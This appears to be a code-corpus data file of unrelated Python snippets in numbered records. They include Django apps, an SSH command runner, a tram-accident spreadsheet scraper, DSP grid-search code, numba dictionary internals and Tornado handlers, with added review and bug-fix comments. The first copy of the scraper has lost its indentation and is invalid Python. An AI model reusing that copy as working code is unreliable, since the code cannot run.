# Open expected input.
expected_file_path = "expected"
expected_f = open(expected_file_path)
expecteds = expected_f.readlines()
expecteds = [x.strip() for x in expecteds]
expected_f.close()
# Inputs and expectations are matched by line number.
assert(len(inputs) == len(expecteds))
for i in range(len(inputs)):
    # NOTE(review): the request target '<start>...<end>' is not a normal
    # URL path; presumably the server parses this framing — TODO confirm.
    connection.request("GET", ("<start>%s<end>" % inputs[i]))
    response = connection.getresponse()
    if response.status != 200:
        print("Request failed for input: %s. Reason: %s" % (inputs[i], response.reason))
    output = response.read()
    # NOTE(review): under Python 2 these multi-arg print() calls print a
    # tuple, e.g. ('Output:', '...').
    print("Output:", output)
    print("Expected:", expecteds[i])
    if expecteds[i] == output:
        print("SUCCESS")
    else:
        print("FAILURE")
5,166 | 5b3a6b44bd9ea80da1983d8254c73bba3e2338e1 | from django.conf.urls import url
from cart import views
urlpatterns = [
    url(r'^add/$', views.cart_add, name='add'),        # add an item to the cart
    url(r'^count/$', views.cart_count, name='count'),  # number of items in the cart
    url(r'^del/$', views.cart_del, name='delete'),     # delete a cart record
    # BUG FIX: pattern lacked the leading '^' anchor, so paths such as
    # 'xupdate/' would also resolve here.
    url(r'^update/$', views.cart_update, name='update'),  # change an item's count
    # BUG FIX: pattern was r'^&' — a path starting with a literal '&', which
    # Django's resolver is never handed, so the cart page was unreachable.
    # The original comment says this is the cart display page, i.e. the app
    # root: r'^$'.
    url(r'^$', views.cart_show, name='show'),          # show the user's cart page
]
|
5,167 | 874fa2a6afdd04f3f2232a86f56d220447160ede | # cases where DictAchievement should unlock
# >> CASE
{'name': 'John Doe', 'age': 24}
# >> CASE
{
'name': 'John Doe',
'age': 24
}
# >> CASE
func({'name': 'John Doe', 'age': 24})
|
5,168 | ace7e5676fcb01c3542952eaacdada9963b8467a | import sgc
import multiprocessing as mp
# import json
import argparse
import os
import re
#Process argument passed to the script
# Parse CLI options: -f server-list file (required) plus either -c commands
# or -S local script (mutually exclusive), then build the `servers` and
# `commands` lists used by worker().
parser = argparse.ArgumentParser(description='Execute commands parallel on remote servers')
parser.add_argument('-f', action='store', required=True, dest='file', help='servers list')
group = parser.add_mutually_exclusive_group()
group.add_argument('-c', action='store', dest='commands', help='commands need to execute')
group.add_argument('-S', action='store', dest='script', help='local script which need to execute on remote servers')
options = parser.parse_args()
# Exit if the input file is empty
if os.path.getsize(options.file) == 0:
    print("Error: server list file is empty")
    exit(2)
# Read the server list, skipping blanks and duplicates, preserving order.
servers = []
with open(options.file, 'r') as server_file:   # 'with' closes the handle; avoids shadowing builtin 'file'
    for line in server_file:
        line = line.strip('\n')
        if len(line) == 0 or line in servers:
            continue
        servers.append(line)
if not servers:
    print("Error: server list file is empty")
    exit(2)
# Build the command list from -c (comma separated, quotes stripped).
commands = []
if options.commands and re.match(r'[a-zA-Z0-9]', options.commands):
    for item in options.commands.split(','):
        item = item.replace('"', '')
        commands.append(item)
# BUG FIX: the script-mode command must be assigned BEFORE the empty-list
# check. Originally the check ran first, so invoking with -S alone always
# aborted with "command list is empty" and script mode was unreachable.
if options.script:
    commands = ['/tmp/' + os.path.basename(options.script)]
if not commands:
    print("Error: command list is empty")
    parser.print_help()
    exit(2)
queue = mp.Queue()
def worker(server, commands):
    """Run *commands* on *server* over SSH (sgc.Ssh) and put a result dict
    {'server': ..., 'commands': ...} on the module-level queue.

    'commands' in the result is either the dict returned by
    session.execute(), a connection error, or the string 'Down' when the
    host does not answer ping. In -S mode the local script is first
    uploaded to /tmp on the remote host and made executable.
    """
    output = {}
    output['server'] = server
    session = sgc.Ssh(server=server)
    # presumably sgc.Ssh exposes .ping / .connect() / .connection /
    # .connection_error / .execute() / .Sftp() — verify against sgc docs.
    if session.ping == 'Alive':
        session.connect()
        if session.connection == False:
            output['commands'] = session.connection_error
        else:
            if options.script:
                if not os.path.exists(options.script):
                    output['commands'] = "Error: the script location {} not exists".format(options.script)
                    print("Error: the script location {} not exists".format(options.script))
                else:
                    curdir = os.getcwd()
                    folder, file = os.path.split(options.script)
                    if not folder:
                        folder = curdir
                    try:
                        os.chdir(folder)
                        sftp = session.Sftp()
                        sftp.chdir('/tmp')
                        sftp.put(file, file)
                        commands = ('/tmp/'+file,)
                        session.execute(('/bin/chmod a+x /tmp/'+file, ))
                    except Exception as error:
                        output['commands'] = error
            # NOTE(review): this unconditionally overwrites any error
            # message stored above (missing script / sftp failure) —
            # TODO confirm that is intended.
            output['commands'] = session.execute(commands)
    else:
        output['commands'] = 'Down'
    queue.put(output)
# Fan out one worker process per server (at most cpu_count() at a time),
# then drain the result queue while children are still running.
procs = []
limits = mp.cpu_count()
while servers:
    # NOTE(review): busy-waits when the process limit is reached (no
    # sleep/join) — burns CPU until a child exits.
    if len(mp.active_children()) < limits:
        server = servers.pop()
        proc = mp.Process(target=worker, args=(server, commands), name=server)
        procs.append(proc)
        proc.start()
# NOTE(review): results still sitting in the queue after the last child
# exits are never printed — the loop condition should also drain the queue.
while mp.active_children() :
    if not queue.empty():
        item = queue.get()
        if item['commands'] == 'Down':
            print("Server: {} : Unable to ping".format(item['server']))
            continue
        # non-dict payloads are error strings/exceptions from worker()
        if type(item['commands']) != type(dict()):
            print("Server: {} : {}".format(item['server'], item['commands']))
            continue
        print("Server: {}".format(item['server']))
        for command in commands:
            # item['commands'][command] is (stdout, stderr)
            if item['commands'][command][0] != "":
                if options.script:
                    print("Output of Command: {}".format(options.script))
                else:
                    print("Output of Command: {}".format(command))
                print(item['commands'][command][0])
            if item['commands'][command][1] != "":
                print("Error occurred on command: {}".format(command))
                print(item['commands'][command][1])
            print("**************************************************************************")
5,169 | 86ec33393bb19ee432c30834ea7983b11f4d1234 | import scraperwiki
import xlrd
xlbin = scraperwiki.scrape("http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls")
book = xlrd.open_workbook(file_contents=xlbin)
sheet = book.sheet_by_index(0)
for n, s in enumerate(book.sheets()):
print "Sheet %d is called %s and has %d columns and %d rows" % (n, s.name, s.ncols, s.nrows)
print sheet.row_values(4)
import datetime
def cellval(cell, datemode):
if cell.ctype == xlrd.XL_CELL_DATE:
datetuple = xlrd.xldate_as_tuple(cell.value, datemode)
if datetuple[3:] == (0, 0, 0):
return datetime.date(datetuple[0], datetuple[1], datetuple[2])
return datetime.date(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5])
if cell.ctype == xlrd.XL_CELL_EMPTY: return None
if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1
return cell.value
print [ cellval(c, book.datemode) for c in sheet.row(4) ]
keys = sheet.row_values(2)
keys[1] = keys[1].replace('.', '')
print keys
for rownumber in range(4, sheet.nrows):
values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]
data = dict(zip(keys, values))
data['rownumber'] = rownumber
del data['']
if data['DATE'] != None and data['FLEET NO'] != None:
scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)
import scraperwiki
import xlrd
# NOTE(review): from here the whole script above is duplicated verbatim
# (looks like an accidental double paste); it re-scrapes and re-saves the
# same rows.
xlbin = scraperwiki.scrape("http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls")
book = xlrd.open_workbook(file_contents=xlbin)
sheet = book.sheet_by_index(0)
for n, s in enumerate(book.sheets()):
    print "Sheet %d is called %s and has %d columns and %d rows" % (n, s.name, s.ncols, s.nrows)
print sheet.row_values(4)
import datetime
def cellval(cell, datemode):
    """Convert an xlrd cell to a native Python value.

    Date cells become datetime.date (when the time part is midnight) or
    datetime.datetime; empty cells become None; booleans become bool;
    everything else passes through unchanged. *datemode* is the
    workbook's date mode (book.datemode).
    """
    if cell.ctype == xlrd.XL_CELL_DATE:
        datetuple = xlrd.xldate_as_tuple(cell.value, datemode)
        if datetuple[3:] == (0, 0, 0):
            return datetime.date(datetuple[0], datetuple[1], datetuple[2])
        # BUG FIX: datetime.date() takes only (year, month, day); the
        # original passed six arguments here and raised TypeError for any
        # cell carrying a time component. datetime.datetime accepts all six.
        return datetime.datetime(datetuple[0], datetuple[1], datetuple[2],
                                 datetuple[3], datetuple[4], datetuple[5])
    if cell.ctype == xlrd.XL_CELL_EMPTY: return None
    if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1
    return cell.value
print [ cellval(c, book.datemode) for c in sheet.row(4) ]
# Header row is row 2; normalize 'FLEET NO.' style dots out of the keys.
keys = sheet.row_values(2)
keys[1] = keys[1].replace('.', '')
print keys
# Data starts at row 4; re-saving with the same unique key is idempotent.
for rownumber in range(4, sheet.nrows):
    values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]
    data = dict(zip(keys, values))
    data['rownumber'] = rownumber
    del data['']   # drop the unnamed column
    if data['DATE'] != None and data['FLEET NO'] != None:
        scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)
|
5,170 | efe2d6f5da36679b77de32d631cca50c2c1dd29e | import numpy as np
from .build_processing_chain import build_processing_chain
from collections import namedtuple
from pprint import pprint
def run_one_dsp(tb_data, dsp_config, db_dict=None, fom_function=None, verbosity=0):
    """Execute a single pass of DSP over *tb_data*.

    A processing chain is built from *dsp_config* (optionally overridden by
    the *db_dict* parameter database) and run to completion.

    Parameters
    ----------
    tb_data : lh5 Table
        Input table. Callers typically pass a pre-selected subset, since an
        optimization pass rarely needs to run over the full data set.
    dsp_config : dict
        The DSP specification for this iteration (see
        build_processing_chain()), including the list of output variables
        that should appear in the output table.
    db_dict : dict (optional)
        DSP parameters database; see build_processing_chain() for the format.
    fom_function : function or None (optional)
        When provided, it is called with the output table and *verbosity*
        and must return a scalar figure-of-merit for the iteration.
    verbosity : int (optional)
        Verbosity for the processing chain and the fom_function call.

    Returns
    -------
    float or lh5 Table
        The figure-of-merit when *fom_function* is given; otherwise the
        output table produced by the chain.
    """
    chain, _, tb_out = build_processing_chain(
        tb_data, dsp_config, db_dict=db_dict, verbosity=verbosity)
    chain.execute()
    if fom_function is None:
        return tb_out
    return fom_function(tb_out, verbosity)
# One grid dimension: the dsp processor *name*, the argument index (or list
# of indices) *i_arg* to vary, the candidate *value_strs*, and an optional
# list of companion arguments that must change in lockstep with this one.
ParGridDimension = namedtuple('ParGridDimension', 'name i_arg value_strs companions')

class ParGrid():
    """ Parameter Grid class

    Each ParGrid entry corresponds to one dsp parameter to be varied.
    The ntuples must follow the pattern:
    ( name, i_arg, value_strs, companions) : ( str, int, list of str, list, or None )

    where name is the name of the dsp routine in dsp_config to be optimized,
    i_arg is the index of the argument to be varied, value_strs is the array
    of strings to set the argument to, and companions is an optional list of
    ( name, i_arg, value_strs ) tuples for companion arguments that need to
    change along with this one.

    Optionally, i_arg can be a list of the argument indices to be varied
    together, where value_strs is a list of lists corresponding to the
    strings to set the arguments to in the same order.
    """
    def __init__(self):
        self.dims = []

    def add_dimension(self, name, i_arg, value_strs, companions=None):
        """Append one dimension to the grid."""
        self.dims.append( ParGridDimension(name, i_arg, value_strs, companions) )

    def get_n_dimensions(self):
        """Number of parameters being varied."""
        return len(self.dims)

    def get_n_points_of_dim(self, i):
        """Number of candidate values along dimension *i*."""
        return len(self.dims[i].value_strs)

    def get_shape(self):
        """Shape tuple of the grid: one entry per dimension."""
        return tuple(self.get_n_points_of_dim(i)
                     for i in range(self.get_n_dimensions()))

    def get_n_grid_points(self):
        """Total number of grid points (product of the shape)."""
        return np.prod(self.get_shape())

    def get_par_meshgrid(self, copy=False, sparse=False):
        """ return a meshgrid of parameter values

        Always uses Matrix indexing (natural for par grid) so that
        mg[i1][i2][...] corresponds to index order in self.dims

        Note copy is False by default as opposed to numpy default of True
        """
        # BUG FIX: this read the nonexistent attribute `values_strs`
        # (AttributeError; the field is `value_strs`) and passed copy/sparse
        # positionally, which numpy absorbs into *xi as two extra arrays
        # instead of using them as the copy/sparse flags.
        axes = [dim.value_strs for dim in self.dims]
        return np.meshgrid(*axes, copy=copy, sparse=sparse, indexing='ij')

    def get_zero_indices(self):
        """Index vector pointing at the first grid point."""
        return np.zeros(self.get_n_dimensions(), dtype=np.uint32)

    def iterate_indices(self, indices):
        """ iterate given indices [i1, i2, ...] by one.

        For easier iteration. The convention here is arbitrary, but it's the
        order the arrays would be traversed in a series of nested for loops
        in the order appearing in dims (first dimension is the outermost
        loop, i.e. the last dimension varies fastest).

        Return False when the grid runs out of indices. Otherwise returns True.
        """
        for iD in reversed(range(self.get_n_dimensions())):
            indices[iD] += 1
            if indices[iD] < self.get_n_points_of_dim(iD): return True
            indices[iD] = 0
        return False

    def get_data(self, i_dim, i_par):
        """Return (name, i_arg, value_str, companions) for point *i_par* of
        dimension *i_dim*."""
        dim = self.dims[i_dim]
        return dim.name, dim.i_arg, dim.value_strs[i_par], dim.companions

    def print_data(self, indices):
        """Pretty-print the parameter values selected by *indices*."""
        print(f"Grid point at indices {indices}:")
        for i_dim, i_par in enumerate(indices):
            name, i_arg, value_str, _ = self.get_data(i_dim, i_par)
            print(f"{name}[{i_arg}] = {value_str}")

    def set_dsp_pars(self, dsp_config, indices):
        """Write the parameter values selected by *indices* into *dsp_config*.

        Values go into the processor's 'init_args' when that key is present,
        otherwise into its 'args'. Companion parameters follow the same
        branch as their primary parameter (as in the original code, the
        branch is chosen by the primary processor's entry).
        """
        for i_dim, i_par in enumerate(indices):
            name, i_arg, value_str, companions = self.get_data(i_dim, i_par)
            # Choose the destination key once instead of duplicating the
            # whole assignment logic for 'init_args' and 'args'.
            if dsp_config['processors'][name].get('init_args') is not None:
                target = 'init_args'
            else:
                target = 'args'
            if np.isscalar(i_arg):
                dsp_config['processors'][name][target][i_arg] = value_str
            else:
                for i in range(len(i_arg)):
                    dsp_config['processors'][name][target][i_arg[i]] = value_str[i]
            if companions is None: continue
            for ( c_name, c_i_arg, c_value_str ) in companions:
                dsp_config['processors'][c_name][target][c_i_arg] = c_value_str[i_par]
def run_grid(tb_data, dsp_config, grid, fom_function, dtype=np.float64, db_dict=None, verbosity=0):
    """Evaluate a figure-of-merit at every point of a DSP parameter grid.

    For each grid point, the corresponding parameter values are written
    into *dsp_config*, one DSP pass is run over *tb_data* (see
    run_one_dsp()), and the scalar returned by *fom_function* is stored.

    Parameters
    ----------
    tb_data : lh5 Table
        Input data; usually a pre-selected subset rather than the full set.
    dsp_config : dict
        DSP specification (see build_processing_chain()); its parameters
        are overwritten in place as the grid is traversed.
    grid : ParGrid
        The parameters and candidate values to scan (see ParGrid).
    fom_function : function
        Maps the output lh5 table of one DSP pass to a scalar
        figure-of-merit; must accept verbosity as its second argument.
    dtype : dtype (optional)
        Element type of the returned array. Should be np.ndarray if
        fom_function is set to None.
    db_dict : dict (optional)
        DSP parameters database; see build_processing_chain().
    verbosity : int (optional)
        Verbosity for the processing chain and fom_function calls.

    Returns
    -------
    grid_values : ndarray
        One figure-of-merit per grid point; axis M of the array corresponds
        to dimension M of *grid*.
    """
    grid_values = np.ndarray(shape=grid.get_shape(), dtype=dtype)
    indices = grid.get_zero_indices()
    if verbosity > 0: print("Starting grid calculations...")
    keep_going = True
    while keep_going:
        grid.set_dsp_pars(dsp_config, indices)
        if verbosity > 1: pprint(dsp_config)
        if verbosity > 0: grid.print_data(indices)
        point = tuple(indices)
        grid_values[point] = run_one_dsp(
            tb_data, dsp_config, db_dict=db_dict, fom_function=fom_function, verbosity=verbosity)
        if verbosity > 0: print('Value:', grid_values[point])
        keep_going = grid.iterate_indices(indices)
    return grid_values
|
5,171 | 89c44d35559504501e4333ea6ff4d3528f1a4c4f | from django.contrib import admin
from .models import Profile
from django.contrib.admin.templatetags.admin_list import admin_actions
admin.site.register(Profile)
# Register your models here.
|
5,172 | 511ea9eb1dc234a488c19f9ee9fbd40f81955d54 | from __future__ import print_function # Python 2/3 compatibility
import boto3
import json
import decimal
AWS_KEY = '****'
AWS_SECRET = '****'
def handler(event, context):
    """Lambda entry point: store an incoming order, then return a greeting
    that lists the selections available on the ordered menu.

    Expects event['body-json'] to carry the order payload, including at
    least 'menu_id' and 'customer_name'.
    """
    # SECURITY NOTE(review): AWS_KEY/AWS_SECRET are hard-coded module-level
    # credentials. A Lambda should normally rely on its execution role
    # rather than embedded keys — rotate these and remove them from source.
    dynamodb = boto3.resource('dynamodb', region_name='us-west-2', aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)
    table = dynamodb.Table('orders')
    body = event['body-json']
    table.put_item(Item=body)
    # Look up the menu the customer ordered from.
    menu_id = body['menu_id']
    table = dynamodb.Table('pizzashop')
    menu = table.get_item(
        Key={
            'menu_id': menu_id,
        }
    )
    selection = menu['Item']['selection']
    # Build "1. item,2. item,..." — join avoids the manual counter and the
    # trailing-comma strip of the original loop.
    all_items = ','.join('{0}. {1}'.format(i, item)
                         for i, item in enumerate(selection, 1))
    message = "Hi " + body['customer_name'] + ', please choose one of these selection: ' + all_items
    return {"message": message}
#return menu
|
5,173 | ad44e9411ba6a07c54bb55b0d8af9d0c16c6b71b | """
Python wrapper that connects CPython interpreter to the numba dictobject.
"""
from collections import MutableMapping
from numba.types import DictType, TypeRef
from numba import njit, dictobject, types, cgutils
from numba.extending import (
overload_method,
box,
unbox,
NativeValue
)
# jit-compiled trampolines: each one forwards a single dict operation into
# nopython mode so the pure-Python TypedDict wrapper below can drive the
# native numba dict implementation from the interpreter.
@njit
def _make_dict(keyty, valty):
    # Allocate a new typed dict and return its MemInfo handle.
    return dictobject._as_meminfo(dictobject.new_dict(keyty, valty))
@njit
def _length(d):
    return len(d)
@njit
def _setitem(d, key, value):
    d[key] = value
@njit
def _getitem(d, key):
    return d[key]
@njit
def _delitem(d, key):
    del d[key]
@njit
def _contains(d, key):
    return key in d
@njit
def _get(d, key, default):
    return d.get(key, default)
@njit
def _setdefault(d, key, default):
    return d.setdefault(key, default)
@njit
def _iter(d):
    # The keys are materialized into a list on the native side.
    return list(d.keys())
@njit
def _copy(d):
    return d.copy()
def _from_meminfo_ptr(ptr, dicttype):
    # Rebuild a Python-level TypedDict around an existing native dict's
    # MemInfo (used by box_dicttype when a dict leaves jitted code).
    d = TypedDict(meminfo=ptr, dcttype=dicttype)
    return d
class TypedDict(MutableMapping):
    """A typed-dictionary usable in Numba compiled functions.
    Implements the MutableMapping interface.
    """
    @classmethod
    def empty(cls, key_type, value_type):
        """Create a new empty TypedDict with *key_type* and *value_type*
        as the types for the keys and values of the dictionary respectively.
        """
        return cls(dcttype=DictType(key_type, value_type))
    def __init__(self, **kwargs):
        """
        Parameters
        ----------
        dcttype : numba.types.DictType; keyword-only
            The dictionary type
        meminfo : MemInfo; keyword-only
            Used internally to pass the MemInfo object when boxing.
        """
        self._dict_type, self._opaque = self._parse_arg(**kwargs)
    def _parse_arg(self, dcttype, meminfo=None):
        # Validate the dict type and either adopt an existing native dict
        # (via its MemInfo, when boxing) or allocate a fresh one.
        if not isinstance(dcttype, DictType):
            raise TypeError('*dcttype* must be a DictType')
        if meminfo is not None:
            opaque = meminfo
        else:
            opaque = _make_dict(dcttype.key_type, dcttype.value_type)
        return dcttype, opaque
    @property
    def _numba_type_(self):
        # Tells numba's typing machinery which numba type this object has.
        return self._dict_type
    # The mapping protocol below delegates every operation to the jitted
    # helper functions defined above.
    def __getitem__(self, key):
        return _getitem(self, key)
    def __setitem__(self, key, value):
        return _setitem(self, key, value)
    def __delitem__(self, key):
        _delitem(self, key)
    def __iter__(self):
        return iter(_iter(self))
    def __len__(self):
        return _length(self)
    def __contains__(self, key):
        return _contains(self, key)
    def __str__(self):
        # Render like a plain dict: "{k1: v1, k2: v2}".
        buf = []
        for k, v in self.items():
            buf.append("{}: {}".format(k, v))
        return '{{{0}}}'.format(', '.join(buf))
    def __repr__(self):
        # Prefix the contents with the numba dict type for debuggability.
        body = str(self)
        prefix = str(self._dict_type)
        return "{prefix}({body})".format(prefix=prefix, body=body)
    def get(self, key, default=None):
        return _get(self, key, default)
    def setdefault(self, key, default=None):
        return _setdefault(self, key, default)
    def copy(self):
        return _copy(self)
# XXX: should we have a better way to classmethod
@overload_method(TypeRef, 'empty')
def typeddict_empty(cls, key_type, value_type):
    """Typing/lowering overload so Dict.empty(...) works inside jitted code."""
    # NOTE(review): this guard compares against the DictType class object
    # itself; confirm that TypeRef.instance_type really is the class (not an
    # instantiated DictType) for the `empty` calls this is meant to accept.
    if cls.instance_type is not DictType:
        return
    def impl(cls, key_type, value_type):
        return dictobject.new_dict(key_type, value_type)
    return impl
@box(types.DictType)
def box_dicttype(typ, val, c):
    """Box a native numba dict into a Python-level TypedDict.

    Wraps the dict's MemInfo in a Python object and hands it, together with
    the serialized dict type, to numba.typeddict._from_meminfo_ptr.
    """
    context = c.context
    builder = c.builder
    # XXX deduplicate
    ctor = cgutils.create_struct_proxy(typ)
    dstruct = ctor(context, builder, value=val)
    # Returns the plain MemInfo
    boxed_meminfo = c.box(
        types.MemInfoPointer(types.voidptr),
        dstruct.meminfo,
    )
    # Look up numba.typeddict._from_meminfo_ptr at runtime and call it with
    # the boxed meminfo plus the (unserialized) dict type object.
    numba_name = c.context.insert_const_string(c.builder.module, 'numba')
    numba_mod = c.pyapi.import_module_noblock(numba_name)
    typeddict_mod = c.pyapi.object_getattr_string(numba_mod, 'typeddict')
    fmp_fn = c.pyapi.object_getattr_string(typeddict_mod, '_from_meminfo_ptr')
    dicttype_obj = c.pyapi.unserialize(c.pyapi.serialize_object(typ))
    res = c.pyapi.call_function_objargs(fmp_fn, (boxed_meminfo, dicttype_obj))
    # Drop the temporary references created above.
    c.pyapi.decref(fmp_fn)
    c.pyapi.decref(typeddict_mod)
    c.pyapi.decref(numba_mod)
    c.pyapi.decref(boxed_meminfo)
    return res
@unbox(types.DictType)
def unbox_dicttype(typ, val, c):
    """Unbox a Python-level TypedDict into its native representation.

    Pulls the MemInfo out of the wrapper's _opaque attribute and rebuilds
    the native dict struct (data pointer + meminfo) from it.
    """
    context = c.context
    builder = c.builder
    miptr = c.pyapi.object_getattr_string(val, '_opaque')
    native = c.unbox(types.MemInfoPointer(types.voidptr), miptr)
    mi = native.value
    ctor = cgutils.create_struct_proxy(typ)
    dstruct = ctor(context, builder)
    # The payload behind the meminfo is cast to the native dict pointer type.
    data_pointer = context.nrt.meminfo_data(builder, mi)
    data_pointer = builder.bitcast(
        data_pointer,
        dictobject.ll_dict_type.as_pointer(),
    )
    dstruct.data = builder.load(data_pointer)
    dstruct.meminfo = mi
    dctobj = dstruct._getvalue()
    c.pyapi.decref(miptr)
    return NativeValue(dctobj)
|
5,174 | 9e2af13a15a98702981e9ee369c3a132f61eac86 | #!python
# -*- coding: utf-8 -*-
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from window.window import *
import sys
# BUG FIX: the star-imports above bind QApplication directly; the module
# name `QtGui` itself was never imported, so QtGui.QApplication raised
# NameError at startup.
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
5,175 | 7484bd9012bc9952b679073ae036de4554d362be | from django import forms
from .models import Recipe, Ingredient, Category, Tag
from blog.widgets import CustomClearableFileInput
class NewCategoriesForm(forms.ModelForm):
    """Form that lets a user type in a brand-new category of their own."""

    friendly_name = forms.CharField(label='... or add your own category',
                                    required=False)

    class Meta():
        model = Category
        fields = ('friendly_name',)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Give every rendered field its example placeholder text.
        hints = {
            'friendly_name': 'One single word only'
        }
        for name in self.fields:
            self.fields[name].widget.attrs['placeholder'] = hints[name]
class NewTagsForm(forms.ModelForm):
    """Form that lets a user add a custom tag alongside the preset tags."""
    tagname = forms.CharField(label='... or add your own tag', required=False)
    class Meta():
        model = Tag
        fields = '__all__'
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # NOTE(review): fields = '__all__' but placeholders only covers
        # 'tagname' — if the Tag model ever gains another editable field,
        # the loop below raises KeyError. Confirm Tag has exactly one field.
        placeholders = {
            'tagname': 'One single word only'
        }
        for field in self.fields:
            placeholder = placeholders[field]
            self.fields[field].widget.attrs['placeholder'] = placeholder
class IngredientForm(forms.ModelForm):
    """Single-ingredient form; combined into IngredientFormSet below."""
    class Meta:
        model = Ingredient
        exclude = ('recipe', )
        labels = {
            'quantity': 'Qty',
        }
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Example placeholder text for each visible field.
        placeholders = {
            'quantity': 'eg: 0.1',
            'unit': 'eg: ml',
            'preparation': 'eg: chopped',
            'name': 'eg: tomatoes'
        }
        for field in self.fields:
            placeholder = placeholders[field]
            self.fields[field].widget.attrs['placeholder'] = placeholder
        # HTML min attribute: quantities must be strictly positive.
        self.fields['quantity'].widget.attrs['min'] = 0.01
# Inline formset linking Ingredient rows to their Recipe: renders up to 25
# extra blank rows and (via min_num/validate_min) requires at least one
# ingredient per recipe.
IngredientFormSet = forms.inlineformset_factory(Recipe, Ingredient,
                                                form=IngredientForm,
                                                extra=25,
                                                min_num=1,
                                                validate_min=True)
class RecipeForm(forms.ModelForm):
    """Main recipe create/edit form.

    Swaps in a custom image widget, renders categories and tags as
    checkbox groups, and attaches example placeholder text to every field.
    """
    # Replace image field
    image = forms.ImageField(label='Image',
                             required=False,
                             widget=CustomClearableFileInput)
    # Change rendering of form to user-friendly checkboxes
    # Credit:
    # https://medium.com/swlh/django-forms-for-many-to-many-fields-d977dec4b024
    category = forms.ModelMultipleChoiceField(
        queryset=Category.objects.all(),
        label='Choose some categories from the list',
        required=False,
        widget=forms.CheckboxSelectMultiple
    )
    # Change rendering of form to user-friendly checkboxes
    # Credit:
    # https://medium.com/swlh/django-forms-for-many-to-many-fields-d977dec4b024
    tag = forms.ModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        label='Choose some tags from the list',
        required=False,
        widget=forms.CheckboxSelectMultiple
    )
    class Meta:
        model = Recipe
        exclude = ('author', 'date',
                   'date_posted', 'date_edited',
                   'vote_count', 'votes', 'recipe_box',
                   'mail_sent', 'discount_code',)
        labels = {
            'intro': 'Brief Description',
        }
    def clean_servings(self):
        # Field-level validation: reject zero or negative serving counts.
        value = self.cleaned_data.get('servings')
        if value < 1:
            raise forms.ValidationError('The number of servings must be \
                greater than zero')
        return value
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Show categories by their human-readable names, sorted alphabetically.
        categories = Category.objects.all().order_by('friendly_name')
        friendly_name = [(c.id, c.get_friendly_name()) for c in categories]
        placeholders = {
            'title': 'eg: Carrot Cake',
            'intro': 'eg: A deliciously sweet dessert',
            'prep_time': 'eg: 1hr 20mins',
            'cook_time': 'eg: 1hr 20mins',
            'total_time': 'eg: 1hr 20mins',
            'directions': 'Describe the steps to make this recipe',
            'image': '',
            'image_credit': 'Who took the photo?',
            'servings': 'No. of servings',
            'tag': '',
            'category': '',
        }
        for field in self.fields:
            placeholder = placeholders[field]
            self.fields[field].widget.attrs['placeholder'] = placeholder
        self.fields['category'].choices = friendly_name
        self.fields['title'].widget.attrs['autofocus'] = True
        self.fields['directions'].required = True
|
5,176 | 27ec06d084bf819383801be0351c04e7d1fc1752 | #Las listas son similares a las tuplas
# ...with the difference that, unlike tuples, they allow modifying the data
# once created.
miLista = ['cadena', 21, 2.8, 'nuevo dato', 25]
print (miLista)
miLista[2] = 3.8 # the third element is now 3.8
print(miLista)
miLista.append('NuevoDato')
print(miLista)
5,177 | b13d4b0ccb693fb97befb4ee47974d8ee076b52b | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Eric Pascual'
from tornado.web import RequestHandler
import os
class UIHandler(RequestHandler):
    """Base handler for the demo UI pages.

    Supplies the template arguments shared by every page and a default GET
    that renders the "not yet implemented" page; concrete pages override get().
    """
    def get_template_args(self):
        # Arguments common to every page template (French UI title).
        return {
            'app_title':"Capteurs de lumière et de couleur"
        }
    def get(self, *args, **kwargs):
        """ By default, the get method displays the "Not yet implemented message".
        """
        self.render(
            os.path.join(self.application.template_home, "nyi.html"),
            **self.get_template_args()
        )
class UIHome(UIHandler):
    """Landing page of the demo UI (home.html)."""
    def get(self, *args, **kwargs):
        self.render(
            os.path.join(self.application.template_home, "home.html"),
            **self.get_template_args()
        )
class UIHBarrier(UIHandler):
    """Optical-barrier demo page (barrier.html)."""
    def get(self, *args, **kwargs):
        template_args = self.get_template_args()
        template_args['demo_title'] = "Barrière optique"
        self.render(
            os.path.join(self.application.template_home, "barrier.html"),
            **template_args
        )
class UIWBDetector(UIHandler):
    """Black/white detector demo page (bwdetector.html)."""
    def get(self, *args, **kwargs):
        template_args = self.get_template_args()
        template_args['demo_title'] = "Détecteur noir/blanc"
        self.render(
            os.path.join(self.application.template_home, "bwdetector.html"),
            **template_args
        )
class UIColorDetector(UIHandler):
    """Color detector demo page (colordetector.html)."""
    def get(self, *args, **kwargs):
        template_args = self.get_template_args()
        template_args['demo_title'] = "Détecteur couleur"
        self.render(
            os.path.join(self.application.template_home, "colordetector.html"),
            **template_args
        )
class UICalibration(UIHandler):
    """Calibration page: injects the current calibration configuration
    obtained from the application's controller into the template."""
    def get(self, *args, **kwargs):
        template_args = self.get_template_args()
        template_args["calibration_cfg"] = self.application.controller.get_calibration_cfg_as_dict()
        self.render(
            os.path.join(self.application.template_home, "calibration.html"),
            **template_args
        )
5,178 | 8a3694f96203ae8d1e306e1c9a5a47bfe26abeb1 | # -*- coding: utf-8 -*-
from django.shortcuts import render_to_response
from django.views.generic import TemplateView
from django.core.context_processors import csrf
from django.template import RequestContext
from django.views.generic import DetailView, ListView , CreateView , UpdateView , DeleteView , FormView , View
from .models import Contact
from django.core.urlresolvers import reverse_lazy
from django.http import HttpResponse
from django.shortcuts import render_to_response
# Create your views here.
#def home(request):
# posts = Post.objects.all()
# contexto = {'posts' : ''}
